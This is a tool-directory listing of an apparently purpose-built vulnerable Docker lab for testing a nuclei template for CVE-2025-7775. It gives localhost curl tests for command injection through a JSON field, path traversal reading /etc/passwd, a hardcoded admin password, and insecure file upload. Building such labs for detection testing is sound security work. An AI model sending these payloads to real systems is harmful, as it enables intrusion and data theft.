Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-7775-vulnerable-lab | Kitploit
Tools/GitHubGitHub/aaqilyousuf/cve-2025-7775-vulnerable-lab
Vulnerability ScannersWeb Application ExploitationCTFPenetration TestingLearning & EducationLabs & Practice
GitHubaaqilyousuf/cve-2025-7775-vulnerable-lab

CVE-2025-7775-vulnerable-lab

View Repository

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
11 months agoNot yet reviewed

CVE-2025-7775 Vulnerable Lab

This repository provides a vulnerable setup to test nuclei template for CVE-2025-7775.

Run

root@kitploit:~
docker build -t vuln-app .
docker run -d --name vuln-test -p 5000:5000 vuln-app

Vulnerability Tests

1. Remote Command Execution (RCE)

root@kitploit:~
curl -X POST http://localhost:5000/api/v1/configuration \
  -H "Content-Type: application/json" \
  -d '{"payload":"ls > /tmp/poc_rce.txt"}'

docker exec -it vuln-test cat /tmp/poc_rce.txt

2. Path Traversal

root@kitploit:~
curl "http://localhost:5000/download?file=/etc/passwd"

3. Hardcoded Credential

root@kitploit:~
curl -X POST http://localhost:5000/api/v1/login \
  -H "Content-Type: application/json" \
  -d '{"username":"admin", "password":"citrix123"}'

4. Insecure File Upload

root@kitploit:~
echo "POC FILE UPLOAD" > test.txt
curl -X POST -F "[email protected]" http://localhost:5000/upload
docker exec -it vuln-test cat /tmp/test.txt

Usage Notes

  • This is a simulated vulnerable environment for testing purposes only
  • Use only in isolated lab environments
  • Not intended for production use
  • For educational and security research purposes only

Cleanup

root@kitploit:~
docker stop vuln-test
docker rm vuln-test
docker rmi vuln-app
Download Tool